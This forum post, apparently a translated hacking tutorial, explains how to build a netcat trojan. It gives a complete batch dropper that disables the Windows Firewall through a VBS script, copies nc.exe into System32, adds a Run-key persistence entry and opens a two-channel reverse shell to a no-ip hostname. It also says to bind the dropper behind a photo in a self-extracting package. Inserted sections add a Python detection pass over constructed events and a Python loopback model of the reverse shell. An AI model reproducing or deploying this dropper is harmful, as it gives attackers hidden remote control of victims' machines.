Forum Thread: Netcat Trojan [My Method by Mohamed Ahmed]

I'll explain a little:

Reverse shell

It is when the victim connects to you and gives you a shell. No-IP redirects your dynamic IP to a DNS name (I have it update every 3 seconds), so however often your IP changes, it is always associated with your hostname (e.g. loquesea.no-ip.org). With that explained, we do it with netcat: we make a bat called vamos.bat

And we put these commands in it:
Code

  • nc.exe

You have to copy it onto the victim, to (System32 is on the PATH, so the bat can then call nc by name; writing there needs administrator rights):

  • copy C:\Extracted\nc.exe C:\WINDOWS\system32\nc.exe

In addition, put this bat in the registry Run key. Why?

-so that every time the machine starts, it runs
Code:

  • start C:\Extracted\data.exe

I also made a VBS to disable the Windows Firewall, which is the following code:

' Windows Firewall COM API (HNetCfg.FwMgr); needs administrator rights
Set objFirewall = CreateObject("HNetCfg.FwMgr")
' the profile currently in use (domain or standard)
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile

' switch the firewall off for that profile
objPolicy.FirewallEnabled = False

  • We save this as desa.vbs, and in the bat we also run it:

Code

  • start C:\Extracted\desa.vbs

The only thing missing is the command to connect:
Code
nc loquesea.no-ip.org 80 | cmd.exe | nc loquesea.no-ip.org 443

The first nc receives whatever you type into your port 80 listener and pipes it into cmd.exe's stdin; cmd.exe's output is piped into the second nc, which sends it back to your port 443 listener. That is why there are two listeners on your side, and why both must already be up when this line runs.

Well, the bat would look like this:
code

@echo off
rem disable the Windows Firewall (needs administrator rights)
start C:\Extracted\desa.vbs
rem put netcat on the PATH
copy C:\Extracted\nc.exe C:\WINDOWS\system32\nc.exe

rem persistence: run vamos.exe (this bat, once converted) every time Windows starts
reg add hklm\software\microsoft\windows\currentversion\run /v wind /t reg_sz /d C:\Extracted\vamos.exe /f

rem the reverse shell: commands come in on 80, cmd.exe output goes back out on 443
nc loquesea.no-ip.org 80 | cmd.exe | nc loquesea.no-ip.org 443

  • and desa.vbs would look like this:

Code
' Windows Firewall COM API (HNetCfg.FwMgr); needs administrator rights
Set objFirewall = CreateObject("HNetCfg.FwMgr")
' the profile currently in use (domain or standard)
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile

' switch the firewall off for that profile
objPolicy.FirewallEnabled = False

Now that you have all that, we convert the bat to an exe with Bat To Exe Converter.exe, then we pack everything together (nc.exe, desa.vbs, vamos.exe): when packing, we put the photo first, then Vamos.exe, and then the rest (you have to respect the order). I use the program SFX COMPILER.
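What the dropper above leaves behind on the box, and how a defender would spot it. This is an added example, not part of the original post: a Python detection pass over constructed Sysmon-style events that model the bat, the VBS and the nc pipeline. The event records, the operator address 203.0.113.7 and the two benign records are made up to match the bat; the EnableFirewall value under SharedAccess\Parameters\FirewallPolicy is where Windows stores the per-profile firewall state that the VBS flips.

```python
"""Detection rules for the netcat dropper's artefacts, run over constructed events."""

# Constructed Sysmon-style events (not real logs): what desa.vbs, the bat and the
# nc pipeline would leave behind, plus two benign records for contrast.
EVENTS = [
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Extracted\desa.vbs"', "parent": r"C:\Windows\System32\cmd.exe"},
    {"event": "RegistrySet", "key": r"HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters"
                                    r"\FirewallPolicy\StandardProfile\EnableFirewall", "data": "0"},
    {"event": "FileCreate", "path": r"C:\Windows\System32\nc.exe", "image": r"C:\Windows\System32\cmd.exe"},
    {"event": "RegistrySet", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wind",
     "data": r"C:\Extracted\vamos.exe"},
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\nc.exe",
     "cmdline": "nc loquesea.no-ip.org 80", "parent": r"C:\Windows\System32\cmd.exe"},
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe", "parent": r"C:\Windows\System32\cmd.exe"},
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\nc.exe",
     "cmdline": "nc loquesea.no-ip.org 443", "parent": r"C:\Windows\System32\cmd.exe"},
    {"event": "NetworkConnect", "image": r"C:\Windows\System32\nc.exe", "dst": "203.0.113.7", "dport": 80},
    {"event": "NetworkConnect", "image": r"C:\Windows\System32\nc.exe", "dst": "203.0.113.7", "dport": 443},
    # benign noise: a legitimate Run entry and an unrelated process
    {"event": "RegistrySet", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "data": r"C:\Windows\System32\SecurityHealthSystray.exe"},
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe", "parent": r"C:\Windows\explorer.exe"},
]

# Autostart targets under these prefixes are treated as expected; anything else is suspect.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files")


def run_key_outside_trusted_dirs(ev):
    """Run-key value whose target lives in a user-writable folder (C:\\Extracted\\vamos.exe)."""
    if ev["event"] != "RegistrySet" or "\\currentversion\\run\\" not in ev["key"].lower():
        return None
    target = ev["data"].strip('"').lower()
    if target.startswith(TRUSTED_DIRS):
        return None
    return f"Run-key persistence -> {ev['data']}"


def firewall_profile_disabled(ev):
    """EnableFirewall set to 0 on a profile: the effect of desa.vbs."""
    if ev["event"] != "RegistrySet":
        return None
    key = ev["key"].lower()
    if "firewallpolicy\\" in key and key.endswith("\\enablefirewall") and ev["data"] == "0":
        return f"Firewall profile disabled via {ev['key']}"
    return None


def netcat_in_system32(ev):
    """nc.exe written to or run from System32, where no Windows build ships it."""
    path = (ev.get("path") or ev.get("image") or "").lower()
    if ev["event"] in ("FileCreate", "ProcessCreate") and path.endswith("\\system32\\nc.exe"):
        return f"{ev['event']}: netcat in System32 ({ev.get('cmdline', path)})"
    return None


def script_host_running_vbs(ev):
    """wscript/cscript launched on a .vbs, as the bat does with start desa.vbs."""
    if ev["event"] == "ProcessCreate" and ev["image"].lower().endswith(("\\wscript.exe", "\\cscript.exe")) \
            and ".vbs" in ev["cmdline"].lower():
        return f"Script host running {ev['cmdline']}"
    return None


def netcat_outbound(ev):
    """Any outbound connection made by nc.exe."""
    if ev["event"] == "NetworkConnect" and ev["image"].lower().endswith("\\nc.exe"):
        return f"nc.exe outbound to {ev['dst']}:{ev['dport']}"
    return None


RULES = [run_key_outside_trusted_dirs, firewall_profile_disabled, netcat_in_system32,
         script_host_running_vbs, netcat_outbound]


def detect(events):
    """Apply every rule to every event; return the list of finding strings."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


def paired_channels(events):
    """The two-port signature of this trojan: one host reached by nc.exe on two different ports."""
    ports = {}
    for ev in events:
        if ev["event"] == "NetworkConnect" and ev["image"].lower().endswith("\\nc.exe"):
            ports.setdefault(ev["dst"], set()).add(ev["dport"])
    return {host: sorted(p) for host, p in ports.items() if len(p) >= 2}


if __name__ == "__main__":
    for line in detect(EVENTS):
        print(line)
    print("paired command/output channels:", paired_channels(EVENTS))
```

Note what the copy into System32 buys the attacker: the Run-key rule on its own would wave nc.exe through as a trusted-directory binary, which is why a separate rule keys on the file name rather than the folder, and why the paired 80/443 connections from one process name are the strongest single signal.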

Finally, on your machine put this in a bat:

Code
nc -vv -l -p 80

and in another bat:

Code
nc -vv -l -p 443

Run both and wait for the connection (disable your firewall beforehand, otherwise the victim's connections to your listeners will be blocked).

If you want to test it first, on a local network or in a virtual machine (VirtualBox), do the following:

On the victim machine copy nc.exe into System32, then make a bat with the following code:

Code
nc <ip of your local machine> 80 | cmd.exe | nc <ip of your local machine> 443

To type "|" press Ctrl + Alt + 1.

Now on our machine, disable the Windows Firewall, then make 2 bats and put one command in each:

This is the first:

Code
nc -vv -l -p 80

This is the second:

Code
nc -vv -l -p 443

NOTE: FIRST RUN THESE 2 BATS SO THAT THEY ARE LISTENING, AND THEN RUN THE COMMAND ON THE VICTIM.
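The exchange in the two-listener setup above, modelled on loopback as an added example that is not part of the original post. It assumes a POSIX `sh` in place of cmd.exe, 127.0.0.1 in place of the no-ip hostname, and OS-chosen ports in place of 80 and 443; everything else mirrors the post: two listeners up first, the victim's pipeline connecting to both, commands going down one channel and output coming back on the other. It also shows the failure mode the NOTE warns about: with no listener up, the victim side gets a refused connection and its pipeline dies.

```python
"""Loopback model of the two-channel netcat reverse shell."""
import socket
import subprocess
import threading

HOST = "127.0.0.1"   # stands in for loquesea.no-ip.org; both sides run locally here


def start_listener(port=0, timeout=10):
    """Equivalent of `nc -vv -l -p <port>`: a listening socket. port=0 lets the OS pick."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, port))
    srv.listen(1)
    srv.settimeout(timeout)   # don't hang forever if the other side never connects
    return srv


def victim_side(cmd_port, out_port, shell=("sh",)):
    """Model of `nc HOST 80 | cmd.exe | nc HOST 443`.

    The first nc feeds whatever arrives on cmd_port into the shell's stdin; the
    shell's stdout is fed into the second nc, which sends it to out_port.  `sh`
    replaces cmd.exe so this runs on POSIX.  Returns the shell's exit code, or
    raises ConnectionRefusedError if a listener is not up yet.
    """
    cmd_in = socket.create_connection((HOST, cmd_port))   # nc HOST 80
    out = socket.create_connection((HOST, out_port))      # nc HOST 443
    proc = subprocess.Popen(list(shell), stdin=cmd_in.fileno(),
                            stdout=out.fileno(), stderr=subprocess.STDOUT)
    rc = proc.wait()          # the shell exits on EOF from the command channel
    cmd_in.close()
    out.close()               # EOF on the output channel tells the operator we're done
    return rc


def operator_session(commands, shell=("sh",)):
    """Operator side: both listeners up *first*, then the victim connects.

    Sends `commands` down the first channel and returns everything the shell
    wrote back on the second, as the two nc windows in the post would show it.
    """
    cmd_srv = start_listener()   # "nc -vv -l -p 80"
    out_srv = start_listener()   # "nc -vv -l -p 443"
    cmd_port = cmd_srv.getsockname()[1]
    out_port = out_srv.getsockname()[1]

    # Only now may the victim run its pipeline (the post's NOTE).
    victim = threading.Thread(target=victim_side, args=(cmd_port, out_port, shell), daemon=True)
    victim.start()

    cmd_conn, _ = cmd_srv.accept()
    out_conn, _ = out_srv.accept()
    cmd_conn.sendall(("\n".join(commands) + "\n").encode())
    cmd_conn.shutdown(socket.SHUT_WR)   # EOF -> shell exits, like closing the nc window

    chunks = []
    while True:
        data = out_conn.recv(4096)
        if not data:
            break
        chunks.append(data)
    victim.join()
    for s in (cmd_conn, out_conn, cmd_srv, out_srv):
        s.close()
    return b"".join(chunks).decode()


def connect_refused_when_no_listener():
    """Failure mode: run the victim pipeline before the listeners exist.

    Grab a free port, close it again, and have the victim connect to it.
    """
    probe = start_listener()
    port = probe.getsockname()[1]
    probe.close()
    try:
        victim_side(port, port)
    except ConnectionRefusedError:
        return True
    return False


if __name__ == "__main__":
    print(operator_session(["echo hello from the shell", "uname"]), end="")
    print("refused without listener:", connect_refused_when_no_listener())
```

Two things the model makes visible that the nc one-liners hide: nothing on the command channel is ever echoed back (only the shell's output travels on the second socket, so the operator sees results but not the prompt), and the shell lives exactly as long as the command socket stays open, which is why closing the port 80 window ends the session.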

greetings..
